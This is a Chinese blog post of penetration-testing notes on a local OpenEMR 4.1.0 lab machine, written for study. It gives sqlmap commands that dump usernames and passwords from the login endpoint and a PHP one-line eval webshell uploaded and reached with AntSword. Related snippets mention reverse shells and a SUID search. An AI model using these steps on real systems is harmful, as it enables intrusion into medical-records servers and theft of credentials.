openemrV4.1.0本地靶机获取其webshell

最新推荐文章于 2024-03-11 17:22:13 发布
最新推荐文章于 2024-03-11 17:22:13 发布
阅读量488 收藏 4
点赞数 4
分类专栏: 渗透笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56607768/article/details/117663298
版权

提示:一次简单的渗透测试笔记

渗透目录

一、渗透步骤

1.首先得到ip过后用nmap扫描开放哪些端口

在这里插入图片描述

2.根据这个IP地址扫描该地址下开放了哪些目录,用dirsearch工具。

在这里插入图片描述

3.根据扫描的目录进行访问就会发现openemr下面存在一个登录界面

在这里插入图片描述

4.然后我用bp抓包发现一个请求地址

在这里插入图片描述

5.我用sqlmap进行sql注入拿到用户名以及密码

1.下面是sqlmap注入过程(判断是否存在注入点,通过发现是存在sql注入的):

Sqlmap-u ”192.168.0.105/openemr/interface/login/validateUser.php?u=admin

2.爆数据库名称。

Sqlmap -u ”192.168.0.105/openemr/interface/login/validateUser.php?u=admin” --dbs

在这里插入图片描述
3.爆数据库的表名

Sqlmap -u ”192.168.0.105/openemr/interface/login/validateUser.php?u=admin” -D openemr --tables

在这里插入图片描述
4.爆出列名

Sqlmap -u ”192.168.0.105/openemr/interface/login/validateUser.php?u=admin” -D openemr  -T users --columns

在这里插入图片描述
5.爆出用户名以及密码

Sqlmap -u ”192.168.0.105/openemr/interface/login/validateUser.php?u=admin” -D openemr  -T users -C username,password --dump

在这里插入图片描述

6.利用用户户名以及密码登录

在这里插入图片描述

7.通过寻找找到有个文件以及php代码上传点,于是我上传了一句话木马

在这里插入图片描述

<?php @eval($_POST['123456']);?>

8.通过蚁剑连到相应的后台

在这里插入图片描述

9.拿到相应的权限

在这里插入图片描述

该过程用于自己学习,大佬勿喷

h1dm
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 822
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
Hack the box靶机 Cache
菜浪马废的博客
09-20 289
80端口开启了 扫一下目录
healthcare靶机(openEMR管理系统SQL注入漏洞)
m0_66299232的博客
11-25 501
6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。
OpenEMR: 开源电子医疗记录系统
最新发布
gitblog_00005的博客
03-11 354
探索开源医疗系统 OpenEMR OpenEMR 是一个免费、开源的电子健康记录(EHR)和实践管理软件,用于支持医疗保健提供者的需求。它是一个社区驱动的项目,旨在提高医疗服务的质量和效率。 什么是 OpenEMROpenEMR 是一套全面的医疗信息系统,提供了包括患者管理、日程安排、处方开具、账单处理、报告生成等功能。该系统还可以与其他医疗软件和服务集成,以进一步增强功能。 OpenEMR ...
OpenEMR登录模块SQL注入分析
smellycat000的专栏
04-19 369
聚焦源代码安全,网罗国内外最新资讯!OpenEMR简介OpenEMR 是一种免费和开源的医疗实践管理系统(Electronic Health Records,EHR),是 ONC 认证的...
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
openemrV4.1.0本地靶机获取webshell.docx
06-07
仅仅用于自己学习的资料
opencv-4.1.0.zip
06-06
树莓派 opencv4.1源码编译
ECharts v4.1.0 rc2
10-13
ECharts (Enterprise Charts 商业产品图表库) 提供商业产品常用图表,底层基于ZRender(一个全新的轻量级canvas类库),创建了坐标系,图例,提示,工具箱等基础组件,并在此上构建出折线图
cwRsyncServer_4.1.0.zip
07-15
Rsync Windows服务端4.1.0版本
PHP魔众短链接系统 v4.1.0
10-24
魔众短链接系统基于PHP开发,支持多用户、数据统计、API对接,可方便的管理生成的短链接。 魔众短链接系统,支持多用户、数据统计、API对接的短链接系统。
OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 通过国际使用ONC认证,OpenEMR的目标是与其专有产品相比的替代品。-PHP开发
05-27
OpenEMR OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 OpenEMR的目标是获得国际使用的ONC认证,它的目标是替代其专有的对讲机OpenEMR OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 通过国际使用ONC认证,OpenEMR的目标是与其专有产品相比的替代品。 贡献OpenEMR是医疗保健开源软件的领导者。 昂贵的专有EMR不再是唯一的选择。 了解如何立即开始捐款! 已经对git满意了? 查阅CONTRIBUTING.md以获取快速设置说明。Support Commun
openemr-5.0.1(开源医疗实践管理应用程序).zip
03-25
OpenEMR OpenEMR是一个开源医疗实践管理应用程序(EHR EMR PMS),具有完全集成的电子健康记录,日程安排,电子账单,国际化,免费支持,充满活力的社区以及更多其他功能。 特征 自由 ONC完全门诊电子病历认证 患者人口统计 病人调度 电子病历 处方药 医疗账单 临床决策规则 患者门户 报告书 多语言支持 安全 免费支持
上传webshell(入侵目标页面主机靶机演示)
weixin_45571987的博客
09-14 1909
上传webshell新手演示写好一句话木马寻找页面上传点(上传木马)寻找上传后的文件位置(绝对路径)连接上目标主机找到目标flag 写好一句话木马 <?php eval(@$_POST['shell']); ?> webshell的分类 ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php 写成php形式 寻找页面上传点(上传木马) 在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第1题)
qq_43233085的博客
01-15 975
墨者靶场 入门:WebShell文件上传漏洞分析溯源 第1题题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某公司内部资料分享平台存在一个文件上传页面,为了保证服务器的安全,现在安全工程师“墨者”将对该上传页面进行安全检测,看是否存在安全漏洞影响服务器的安全性。 实训目标 1、了解PHP及PHP5各个版本的相关知识; 2、了解PHP上传绕过扩展名的方法; 3、了解Burpsuite的使用方...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4253
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
【墨者学院】WebShell文件上传分析溯源(第2题)
yoyoko_chan的博客
07-23 275
0x00  偶然看到这道题,学习一下文件上传的新姿势。 0x01  打开靶机,没啥提示,那就先用御剑扫一扫后台  发现 /admin/upload1.php /admin/upload2.php  访问/admin/upload1.php后发现显示权限不够,并直接跳到了/admin/upload2.php  抓包查看upload1.php的相应包,发现该弹窗是由JS代码控制的,浏览器设置禁用JS后再次访问  主菜来了,直接上传菜刀,上传成功后用蚁剑试连接,出现异常  猜测是由于网站后台对上传的文件
WebShell
MLer
11-02 907
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。 一、直接上传获取webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管
OPENEMR 在Linux下的安装
曾立文的博客
09-08 881
OPENEMR是开源电子病例记录,Open Source electronic health records 本文介绍其在Linux(ubuntu 18)下的安装。 本文的参考学习链接是:https://www.techrepublic.com/article/how-to-install-the-openemr-medical-software-on-ubuntu-server/ 安装前提条件 开始学习的教程要求安装好了apache2 和PHP,Mysql,如果没有这个条件,请看linux下安装:
todesk 4.1.0
11-11
todesk 4.1.0是一个项目管理软件,它提供了强大的工具和功能,以帮助团队更好地组织和跟踪他们的工作。这个版本引入了一些新的特性和改进,使得软件更加高效和易于使用。 首先,todesk 4.1.0增加了更灵活的任务分配...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值